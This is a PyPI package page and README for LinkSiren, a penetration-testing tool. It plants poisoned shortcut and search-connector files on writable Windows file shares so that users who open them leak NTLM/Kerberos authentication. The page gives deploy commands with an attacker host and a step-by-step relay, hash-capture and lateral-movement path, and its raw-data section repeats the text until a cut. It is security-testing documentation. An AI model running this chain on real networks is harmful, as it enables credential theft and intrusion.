| Name | linksiren JSON |
| Version |
0.0.4
JSON |
| download |
| home_page | None |
| Summary | Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication. |
| upload_time | 2025-01-20 16:41:21 |
| maintainer | None |
| docs_url | None |
| author | George Hamilton |
| requires_python | >=3.9 |
| license | BSD 3-Clause License Copyright (c) 2023, gjhami Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. |
| keywords |
coerce
pentest
windows
authentication
coercion
|
| VCS |
 |
| bugtrack_url |
|
| requirements |
impacket
tqdm
|
| Travis-CI |
No Travis.
|
| coveralls test coverage |
No coveralls.
|
# LinkSiren
[](https://pypi.python.org/pypi/LinkSiren/)
[](https://pypi.org/project/linksiren/)
[](https://github.com/gjhami/LinkSiren/blob/main/LICENSE)
_The Siren waits thee, singing song for song._ - Walter Savage Landor
LinkSiren is your new favorite escalation tactic when you're stuck as a non-privileged user with lots of access to file shares. LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to optimal locations in accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from users that open them and starting the Webclient service on their machines. It's like [Farmer](https://github.com/mdsecactivebreach/Farmer/tree/1f37598125a92c9edf41295c6c1b7c258143968d), [Lnkbomb](https://github.com/dievus/lnkbomb), or [Slinky](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky) but it identifies the best place to put the files for maximum coercion, has scalable deployment and cleanup built in, and generates detailed logs useful for client engagements.
# Installation
Using pipx (Recommended)
```
# Install linksiren
pipx install git+https://github.com/gjhami/LinkSiren.git
```
<details>
<summary>Alternatively, install from PyPi or source</summary>
Using PyPi
```
# Install from PyPi using pipx
pipx install linksiren
```
From Source
```
# Download source code
git clone https://github.com/gjhami/LinkSiren.git
cd LinkSiren
# Optional: Set up a virtual environment and install requirements
python -m venv .venv
source ./.venv/bin/activate # Linux
# .\.venv\Scripts\activate # Windows
# Install requirements
python -m pip install -r requirements.txt
```
</details>
# Typical Usage
```bash
# Identify optimal locations for poisoned file deployment
linksiren identify --targets <shares file> [domain]/username[:password]
# Deploy to identified locations
linksiren deploy --attacker <attacker IP> [domain]/username[:password]
# Capture hashes / relay authentication / exploit the WebClient service
# Cleanup poisoned files
linksiren cleanup [domain]/username[:password]
```
# Detailed Usage
1. Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:
```
\\server1.domain.tld\
\\server2.domain.tld\share1
\\server3.domain.tld\share2\folder1\subfolder1
```
2. Use LinkSiren to crawl the provided paths to the specified depth, searching for the ideal location to place a file that will coerce authentication. Resulting UNC paths are saved in `folder_targets.txt` in the current directory.
```bash
# Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary.
# You may also fine tune --max-concurrency to improve performance.
# Note: Specify '.' as the domain to log in using a local user account
linksiren identify --targets targets.txt [domain]/username[:password]
```
3. Use LinkSiren to deploy payloads to the locations identified in step 2. Optionally, specify a payload name and extension. The payload type (.searchConnector-ms, .library-ms, .lnk, or .url) will be selected automatically from the extension. Folders where payloads were successfully written are saved to `payloads_written.txt`. Use the hostname or DNS name of the attacker host and perform poisoning as necessary to get intranet zoned, as described in my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/) and [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#abuse), to coerce HTTP authentication.
```bash
linksiren deploy --attacker <attacker IP> [domain]/username[:password]
```
4. Let the hashes come to you and relay them as you see fit :)
- Find LDAP(S) Targets: Use [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) or [NetExec's ldap-checker](https://www.netexec.wiki/ldap-protocol/check-ldap-signing) to identify LDAP services vulnerable to relay.
- Find MSSQL Targets: Use [mssqlrelay](https://github.com/CompassSecurity/mssqlrelay) to identify MSSQL services that do not enforce encryption and are therefore vulnerable to relay. Also, consider combining this with information about Microsoft Configuration Manager to perform [TAKEOVER-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-1/takeover-1_description.md).
- Find SMB Targets: Use [NetExec's SMB functionaltiy](https://www.netexec.wiki/smb-protocol/enumeration/smb-signing-not-required) to identify SMB services vulnerable to relay.
- Find HTTP Targets: Use this [one-liner](https://x.com/Defte_/status/1795815420903002495) to check for ADCS ESC8 without authentication, or use NetExec/Certipy/Certify with authentication to identify ESC8 and other escalation paths as [described by TheHackerRecipes](https://www.thehacker.recipes/ad/movement/adcs/#recon) that may also be viable relay targets.
- Use NTLMRelayx from [Impacket](https://github.com/fortra/impacket) to relay to identified targets with pcredz for hash capture on the attacker machine. I highly recommend `-socks` mode with NTLMRelayx.
- [Krbjack](https://github.com/almandin/krbjack) or [Krbrelayx](https://github.com/dirkjanm/krbrelayx) could be used to relay Kerberos authentication to a machine if you can create a DNS record thanks to the a technique published by James Foreshaw and described in a [blog post](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx) from Synacktiv. Domain users may create new DNS records by default and creating new DNS records is often possible without authentication thanks to [DDSpoof](https://github.com/akamai/DDSpoof). Note that the target service for the relay attack must map to the same service class as the relayed authentication and the service must not implement signing, channel binding, or extended protection for authentication.
5. Cleanup the payload files when the attack is finished. LinkSiren will output messages about any previously written payloads that it isn't able to successfully delete.
```bash
linksiren cleanup [domain]/username[:password]
```
6. Scan for the WebClient service, now likely started on several machines, see [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#recon) for details. See this BHIS presentation [Attack Tactics: Shadow Creds for Privesc](https://www.linkedin.com/posts/black-hills-information-security_attack-tactic-shadow-creds-activity-7284615209929891840-Po8m) for how HTTP authentication coerced from the service can be used privesc and lateral movement. Additionally see my blog post [Files that Coerce](https://alittleinsecure.com/files-that-coerce-search-connectors-and-beyond/) for details of how a machine, once taken over using shadow credentials, can be used to coerce authentication from logged in users.
# Attack Path Assocaited with LinkSiren
1. (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. See the note in [theHackerRecipes WebClient Abuse](https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient#abuse) and my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/).
2. Create a list of UNC paths to writeable SMB shares.
- Note: You may also just provide a list of hosts (ex. `\\<host>`). Linksiren will list the shares on the host and add the base folder of each share as a target.
- Note: Consider write and delete privileges are distinct on Windows. It is possible you can create a poisoned file but will not have permissions to delete it. If this happens, LinkSiren will be very verbose in letting you know.
3. [Optional] Run LinkSiren in `generate` mode to write templates locally
4. [Optional] Run LinkSiren in `rank` mode to output rankings for accessible folders based on recent access.
5. Run LinkSiren in `identify` mode to find the best places to put poisoned files.
6. Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.
7. Run LinkSiren in `deploy` mode to place payloads in the optimal locations identified.
8. Let the hashes roll in. Relay and/or crack as desired.
9. Run LinkSiren in `cleanup` mode to delete all the poisoned files.
# Usage Modes
LinkSiren offers the following modes of operation:
### Generate
Create poisoned files to use for coercion and store them locally.
<details>
<summary>Usage</summary>
```
linksiren generate --help
usage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]
Output specified payload file to the current directory instead of a remote location.
options:
-h, --help show this help message and exit
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in malicious URL
```
</details>
### Rank
Given a list of accessible shares or hosts, output ranks for the folders within them based on the liklihood placing a file in the folder will coerce authentication from a user.
<details>
<summary>Usage</summary>
```
linksiren rank --help
usage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mc MAX_CONCURRENCY] credentials
Output identified subfolders and rankings to folder_rankings.txt
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target.
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Number of days as an integer for active files.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1 assigned.
-is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
(Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking process.
-mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
(Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
accelerate crawling multiple shares on a single host.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for placing poisoned files.
```
</details>
### Identify
Given a list of accessible shares or hosts and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.
<details>
<summary>Usage</summary>
```
linksiren identify --help
usage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mf MAX_FOLDERS_PER_TARGET] [-mc MAX_CONCURRENCY] credentials
Identify target folders for payload distribution and output to payload_targets.txt
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Max number of days since within which a file is considered active.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.
-is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
(Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking and optimal poisoning folder identification process.
-mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET
(Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.
-mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
(Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
accelerate crawling multiple shares on a single host.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories to crawl for optimal locations to write poisoned files.
```
</details>
### Deploy
Generate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of `identify` mode. Output a list of UNC paths to folders where payloads were successfully deployed for cleanup.
<details>
<summary>Usage</summary>
```
linksiren deploy --help
usage: linksiren deploy [-h] -a ATTACKER [-t TARGETS] [-n PAYLOAD] credentials
Deploy payloads to all folder UNC paths listed one per line in the file specified using --targets
options:
-h, --help show this help message and exit
-t TARGETS, --targets TARGETS
(Default: 'payload_targets.txt') Path to a text file containing UNC paths to folders into which poisoned files will be deployed.
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
credentials [domain/]username[:password] for authentication
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in poisoned files.
```
</details>
### Cleanup
Remove all payloads from the specified UNC paths, typically the output of `deploy` mode.
<details>
<summary>Usage</summary>
```
linksiren cleanup --help
usage: linksiren cleanup [-h] [-t TARGETS] credentials
Delete poisoned files from folder UNC paths specified in --targets
options:
-h, --help show this help message and exit
-t TARGETS, --targets TARGETS
(Default: 'payloads_written.txt') Path to a text file containing UNC paths poisoned files to clean up.
Required Arguments:
credentials [domain/]username[:password] for authentication
```
</details>
# Other Information
### What Payload Type Should I Use?
Search Connectors (.searchConnector-ms): This is generally the best option. They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.
### How is this better than the other tools?
Summary
- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files
- Targeted malicious file placement
- Single command deployment and cleanup
- Cross platform with python
As in real estate, consider the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.
Other tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares, then you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a poisoned file in a sea of accessible shares.
LinkSiren crawls accessible shares and ranks every subfolder based on the liklihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. Additionally, LinkSiren records the full UNC path of malicious files it creates, allowing for cleanup with a single command.
### How will you make it even better?
I'm looking to add the following features:
- [ ] Add safety features:
- [ ] Check if a file exists before overwriting it with a payload in deploy mode.
- [ ] Check if files can be deleted from a target path before creating a payload there.
- [ ] Add the ability to deploy files encrypted with EFS to trigger the start of the Encrypting File Service on Windows 11 machines so authentication can subsequently be coreced using tools like [Coercer](https://github.com/p0dalirius/Coercer) and [PetitPotam](https://github.com/topotam/PetitPotam).
- [ ] Repackage for use with UV.
- [ ] Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.
- [ ] Test for anonymous access to shares.
- [ ] Enable authentication using a NTLM hash.
- [ ] Enable ticket based authnentication (Kerberos).
- [ ] Add pydantic validation for arguments including targets and output file names.
- [ ] Test the tool through a socks proxy connection to an smb share generated using ntlmrelayx.
### Disclaimer
This tools is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.
Raw data
{
"_id": null,
"home_page": null,
"name": "linksiren",
"maintainer": null,
"docs_url": null,
"requires_python": ">=3.9",
"maintainer_email": null,
"keywords": "coerce, pentest, windows, authentication, coercion",
"author": "George Hamilton",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/82/3a/4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005/linksiren-0.0.4.tar.gz",
"platform": null,
"description": "# LinkSiren\r\n\r\n[](https://pypi.python.org/pypi/LinkSiren/)\r\n[](https://pypi.org/project/linksiren/)\r\n[](https://github.com/gjhami/LinkSiren/blob/main/LICENSE)\r\n\r\n_The Siren waits thee, singing song for song._ - Walter Savage Landor\r\n\r\nLinkSiren is your new favorite escalation tactic when you're stuck as a non-privileged user with lots of access to file shares. LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to optimal locations in accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from users that open them and starting the Webclient service on their machines. It's like [Farmer](https://github.com/mdsecactivebreach/Farmer/tree/1f37598125a92c9edf41295c6c1b7c258143968d), [Lnkbomb](https://github.com/dievus/lnkbomb), or [Slinky](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky) but it identifies the best place to put the files for maximum coercion, has scalable deployment and cleanup built in, and generates detailed logs useful for client engagements.\r\n\r\n# Installation\r\nUsing pipx (Recommended)\r\n```\r\n# Install linksiren\r\npipx install git+https://github.com/gjhami/LinkSiren.git\r\n```\r\n\r\n<details>\r\n<summary>Alternatively, install from PyPi or source</summary>\r\n\r\nUsing PyPi\r\n```\r\n# Install from PyPi using pipx\r\npipx install linksiren\r\n```\r\n\r\nFrom Source\r\n```\r\n# Download source code\r\ngit clone https://github.com/gjhami/LinkSiren.git\r\ncd LinkSiren\r\n\r\n# Optional: Set up a virtual environment and install requirements\r\npython -m venv .venv\r\nsource ./.venv/bin/activate # Linux\r\n# .\\.venv\\Scripts\\activate # Windows\r\n\r\n# Install requirements\r\npython -m pip install -r requirements.txt\r\n```\r\n\r\n</details>\r\n\r\n# Typical Usage\r\n```bash\r\n# Identify optimal locations for poisoned file deployment\r\nlinksiren identify --targets <shares file> [domain]/username[:password]\r\n\r\n# Deploy to identified locations\r\nlinksiren deploy --attacker <attacker IP> [domain]/username[:password]\r\n\r\n# Capture hashes / relay authentication / exploit the WebClient service\r\n\r\n# Cleanup poisoned files\r\nlinksiren cleanup [domain]/username[:password]\r\n```\r\n\r\n# Detailed Usage\r\n1. Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:\r\n```\r\n\\\\server1.domain.tld\\\r\n\\\\server2.domain.tld\\share1\r\n\\\\server3.domain.tld\\share2\\folder1\\subfolder1\r\n```\r\n\r\n2. Use LinkSiren to crawl the provided paths to the specified depth, searching for the ideal location to place a file that will coerce authentication. Resulting UNC paths are saved in `folder_targets.txt` in the current directory.\r\n```bash\r\n# Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary.\r\n# You may also fine tune --max-concurrency to improve performance.\r\n# Note: Specify '.' as the domain to log in using a local user account\r\nlinksiren identify --targets targets.txt [domain]/username[:password]\r\n```\r\n\r\n3. Use LinkSiren to deploy payloads to the locations identified in step 2. Optionally, specify a payload name and extension. The payload type (.searchConnector-ms, .library-ms, .lnk, or .url) will be selected automatically from the extension. Folders where payloads were successfully written are saved to `payloads_written.txt`. Use the hostname or DNS name of the attacker host and perform poisoning as necessary to get intranet zoned, as described in my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/) and [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#abuse), to coerce HTTP authentication.\r\n```bash\r\nlinksiren deploy --attacker <attacker IP> [domain]/username[:password]\r\n```\r\n\r\n4. Let the hashes come to you and relay them as you see fit :)\r\n - Find LDAP(S) Targets: Use [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) or [NetExec's ldap-checker](https://www.netexec.wiki/ldap-protocol/check-ldap-signing) to identify LDAP services vulnerable to relay.\r\n - Find MSSQL Targets: Use [mssqlrelay](https://github.com/CompassSecurity/mssqlrelay) to identify MSSQL services that do not enforce encryption and are therefore vulnerable to relay. Also, consider combining this with information about Microsoft Configuration Manager to perform [TAKEOVER-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-1/takeover-1_description.md).\r\n - Find SMB Targets: Use [NetExec's SMB functionaltiy](https://www.netexec.wiki/smb-protocol/enumeration/smb-signing-not-required) to identify SMB services vulnerable to relay.\r\n - Find HTTP Targets: Use this [one-liner](https://x.com/Defte_/status/1795815420903002495) to check for ADCS ESC8 without authentication, or use NetExec/Certipy/Certify with authentication to identify ESC8 and other escalation paths as [described by TheHackerRecipes](https://www.thehacker.recipes/ad/movement/adcs/#recon) that may also be viable relay targets.\r\n - Use NTLMRelayx from [Impacket](https://github.com/fortra/impacket) to relay to identified targets with pcredz for hash capture on the attacker machine. I highly recommend `-socks` mode with NTLMRelayx.\r\n - [Krbjack](https://github.com/almandin/krbjack) or [Krbrelayx](https://github.com/dirkjanm/krbrelayx) could be used to relay Kerberos authentication to a machine if you can create a DNS record thanks to the a technique published by James Foreshaw and described in a [blog post](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx) from Synacktiv. Domain users may create new DNS records by default and creating new DNS records is often possible without authentication thanks to [DDSpoof](https://github.com/akamai/DDSpoof). Note that the target service for the relay attack must map to the same service class as the relayed authentication and the service must not implement signing, channel binding, or extended protection for authentication.\r\n\r\n5. Cleanup the payload files when the attack is finished. LinkSiren will output messages about any previously written payloads that it isn't able to successfully delete.\r\n```bash\r\nlinksiren cleanup [domain]/username[:password]\r\n```\r\n\r\n6. Scan for the WebClient service, now likely started on several machines, see [theHackerRecipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient#recon) for details. See this BHIS presentation [Attack Tactics: Shadow Creds for Privesc](https://www.linkedin.com/posts/black-hills-information-security_attack-tactic-shadow-creds-activity-7284615209929891840-Po8m) for how HTTP authentication coerced from the service can be used privesc and lateral movement. Additionally see my blog post [Files that Coerce](https://alittleinsecure.com/files-that-coerce-search-connectors-and-beyond/) for details of how a machine, once taken over using shadow credentials, can be used to coerce authentication from logged in users.\r\n\r\n# Attack Path Assocaited with LinkSiren\r\n1. (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. See the note in [theHackerRecipes WebClient Abuse](https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient#abuse) and my blog post [DNS Hijacking: Say My Name](https://alittleinsecure.com/dns-hijacking-say-my-name/).\r\n2. Create a list of UNC paths to writeable SMB shares.\r\n - Note: You may also just provide a list of hosts (ex. `\\\\<host>`). Linksiren will list the shares on the host and add the base folder of each share as a target.\r\n - Note: Consider write and delete privileges are distinct on Windows. It is possible you can create a poisoned file but will not have permissions to delete it. If this happens, LinkSiren will be very verbose in letting you know.\r\n3. [Optional] Run LinkSiren in `generate` mode to write templates locally\r\n4. [Optional] Run LinkSiren in `rank` mode to output rankings for accessible folders based on recent access.\r\n5. Run LinkSiren in `identify` mode to find the best places to put poisoned files.\r\n6. Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.\r\n7. Run LinkSiren in `deploy` mode to place payloads in the optimal locations identified.\r\n8. Let the hashes roll in. Relay and/or crack as desired.\r\n9. Run LinkSiren in `cleanup` mode to delete all the poisoned files.\r\n\r\n# Usage Modes\r\nLinkSiren offers the following modes of operation:\r\n\r\n### Generate\r\nCreate poisoned files to use for coercion and store them locally.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren generate --help\r\nusage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]\r\n\r\nOutput specified payload file to the current directory instead of a remote location.\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n -n PAYLOAD, --payload PAYLOAD\r\n (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url\r\n\r\nRequired Arguments:\r\n -a ATTACKER, --attacker ATTACKER\r\n Attacker IP or hostname to place in malicious URL\r\n```\r\n</details>\r\n\r\n### Rank\r\nGiven a list of accessible shares or hosts, output ranks for the folders within them based on the liklihood placing a file in the folder will coerce authentication from a user.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren rank --help\r\nusage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mc MAX_CONCURRENCY] credentials\r\n\r\nOutput identified subfolders and rankings to folder_rankings.txt\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n -md MAX_DEPTH, --max-depth MAX_DEPTH\r\n (Default: 3) The maximum depth of folders to search within the target.\r\n -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD\r\n (Default: 2) Number of days as an integer for active files.\r\n -f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1 assigned.\r\n -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]\r\n (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking process.\r\n -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY\r\n (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not\r\n accelerate crawling multiple shares on a single host.\r\n\r\nRequired Arguments:\r\n credentials [domain/]username[:password] for authentication\r\n -t TARGETS, --targets TARGETS\r\n Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for placing poisoned files.\r\n```\r\n</details>\r\n\r\n### Identify\r\nGiven a list of accessible shares or hosts and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren identify --help\r\nusage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mf MAX_FOLDERS_PER_TARGET] [-mc MAX_CONCURRENCY] credentials\r\n\r\nIdentify target folders for payload distribution and output to payload_targets.txt\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n -md MAX_DEPTH, --max-depth MAX_DEPTH\r\n (Default: 3) The maximum depth of folders to search within the target\r\n -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD\r\n (Default: 2) Max number of days since within which a file is considered active.\r\n -f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.\r\n -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]\r\n (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking and optimal poisoning folder identification process.\r\n -mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET\r\n (Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.\r\n -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY\r\n (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not\r\n accelerate crawling multiple shares on a single host.\r\n\r\nRequired Arguments:\r\n credentials [domain/]username[:password] for authentication\r\n -t TARGETS, --targets TARGETS\r\n Path to a text file containing UNC paths to file shares / base directories to crawl for optimal locations to write poisoned files.\r\n```\r\n\r\n</details>\r\n\r\n### Deploy\r\nGenerate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of `identify` mode. Output a list of UNC paths to folders where payloads were successfully deployed for cleanup.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren deploy --help\r\nusage: linksiren deploy [-h] -a ATTACKER [-t TARGETS] [-n PAYLOAD] credentials\r\n\r\nDeploy payloads to all folder UNC paths listed one per line in the file specified using --targets\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n -t TARGETS, --targets TARGETS\r\n (Default: 'payload_targets.txt') Path to a text file containing UNC paths to folders into which poisoned files will be deployed.\r\n -n PAYLOAD, --payload PAYLOAD\r\n (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url\r\n\r\nRequired Arguments:\r\n credentials [domain/]username[:password] for authentication\r\n -a ATTACKER, --attacker ATTACKER\r\n Attacker IP or hostname to place in poisoned files.\r\n```\r\n</details>\r\n\r\n### Cleanup\r\nRemove all payloads from the specified UNC paths, typically the output of `deploy` mode.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren cleanup --help\r\nusage: linksiren cleanup [-h] [-t TARGETS] credentials\r\n\r\nDelete poisoned files from folder UNC paths specified in --targets\r\n\r\noptions:\r\n -h, --help show this help message and exit\r\n -t TARGETS, --targets TARGETS\r\n (Default: 'payloads_written.txt') Path to a text file containing UNC paths poisoned files to clean up.\r\n\r\nRequired Arguments:\r\n credentials [domain/]username[:password] for authentication\r\n```\r\n\r\n</details>\r\n\r\n# Other Information\r\n### What Payload Type Should I Use?\r\nSearch Connectors (.searchConnector-ms): This is generally the best option. They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.\r\n\r\n### How is this better than the other tools?\r\nSummary\r\n- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files\r\n- Targeted malicious file placement\r\n- Single command deployment and cleanup\r\n- Cross platform with python\r\n\r\nAs in real estate, consider the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.\r\n\r\nOther tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares, then you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a 